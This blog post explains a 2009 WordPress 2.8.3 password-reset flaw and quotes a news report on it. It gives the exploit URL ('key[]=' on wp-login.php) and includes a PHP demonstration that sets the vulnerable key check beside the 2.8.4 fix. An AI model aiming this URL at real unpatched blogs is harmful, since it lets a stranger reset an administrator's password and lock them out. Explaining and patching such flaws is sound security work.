The latest one to become public is a simple but effective flaw. It doesn't enable a take-over, since the freshly generated password is mailed to the account's registered address rather than shown to the attacker, but it does allow a prankster to lock an admin out of their blog by resetting the password.
> Developers of the widely used WordPress blogging software have released an update that fixes a vulnerability that let attackers take over accounts by resetting the administrator password.
>
> The bug in version 2.8.3 is trivial to exploit remotely using nothing more than a web browser and a specially manipulated link. Typically, requests to reset a password are handled using a registered email address. Using the special URL, the old password is removed and a new one generated in its place with no confirmation required, according to this alert published on the Full-Disclosure mailing list.
>
> The flaw lurks in some of the PHP code that fails to properly scrutinize user input when the password reset feature is invoked. Exploiting it is as easy as directing a web browser to a link that looks something like:
I actually saw the alert as it was published on Full-Disclosure; obviously anything to do with WordPress catches my attention.
The exploit is triggered by pointing a browser at the following URL on an unpatched WordPress 2.8.3 blog (the fix shipped in 2.8.4):

```
http://www.domain.com/wp-login.php?action=rp&key[]=
```

Simple but effective. The `key[]=` makes PHP hand the reset code an array instead of a string, and the only check on the key was a non-empty test that an array passes.
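How the array slips past the check, as an added example that is not the page's or WordPress's own code: a cut-down PHP model of the 2.8.3 `reset_password()` path (the key sanitisation, the `empty()` guard, and `wpdb::prepare()` treating an array argument as its list of values) beside the `is_array()` guard that 2.8.4 added. The `$users` table, the function names and the sample query strings are all constructed for the demonstration.

```php
<?php
// Added illustration, not WordPress's own code: a stripped-down model of the
// 2.8.3 reset_password() key check, of how wpdb::prepare() turned the array
// into an empty-string parameter, and of the is_array() guard added in 2.8.4.
// The $users table, the function names and the inputs are all constructed here.

declare(strict_types=1);

// Stand-in for wp_users (constructed). user_activation_key is empty for every
// account with no pending reset request, which on a fresh blog includes admin.
$users = [
    ['ID' => 1, 'user_login' => 'admin',  'user_activation_key' => ''],
    ['ID' => 2, 'user_login' => 'editor', 'user_activation_key' => 'k7f2a9'],
];

// Models wpdb::prepare("... WHERE user_activation_key = %s", $key) in 2.8.3:
// when the first argument is an array it is taken as the vsprintf()-style
// argument list, so key[]= (which PHP decodes as ['']) supplies '' as the value.
function prepared_key_value($key): string
{
    if (is_array($key)) {
        $key = $key[0] ?? '';
    }
    return (string) $key;
}

// Stand-in for the SELECT against wp_users.
function lookup_by_key(array $users, string $value): ?array
{
    foreach ($users as $u) {
        if ($u['user_activation_key'] === $value) {
            return $u;
        }
    }
    return null;
}

// Vulnerable shape (2.8.3): only empty() guards the key.
function reset_password_vulnerable(array $users, $key): ?array
{
    $key = preg_replace('/[^a-z0-9]/i', '', $key); // array in, array out
    if (empty($key)) {                              // [''] is NOT empty
        return null;
    }
    $user = lookup_by_key($users, prepared_key_value($key));
    if ($user === null) {
        return null;
    }
    // The real code now generates a new password, stores it and mails it to
    // the user; the attacker never sees it, hence lockout rather than take-over.
    return $user;
}

// Hardened shape: 2.8.4 added an is_array() check; requiring a non-empty
// string covers the same ground and also rejects other non-string input.
function reset_password_fixed(array $users, $key): ?array
{
    if (!is_string($key)) {
        return null;
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return null;
    }
    return lookup_by_key($users, $key);
}

// Constructed inputs: what PHP places in $_GET['key'] for each query string.
$cases = [
    'key=k7f2a9' => 'k7f2a9',   // legitimate reset link
    'key='       => '',         // missing key
    'key[]='     => [''],       // the published exploit
];

foreach ($cases as $qs => $key) {
    $v = reset_password_vulnerable($users, $key);
    $f = reset_password_fixed($users, $key);
    printf("%-12s vulnerable: %-9s fixed: %s\n", $qs,
        $v ? 'resets ' . $v['user_login'] : 'rejected',
        $f ? 'resets ' . $f['user_login'] : 'rejected');
}
```

Run it with `php` on the command line. The legitimate link behaves the same in both versions, the missing key is rejected by both, and the `key[]=` case resets the first account with an empty activation key in the vulnerable version, which in the constructed table (as on a typical install) is the administrator, while the fixed version rejects it before any lookup happens. The general lesson is the one the page is really about: anything read from `$_GET`/`$_POST` can be an array, so a type check has to come before `empty()` and before the value reaches the query layer.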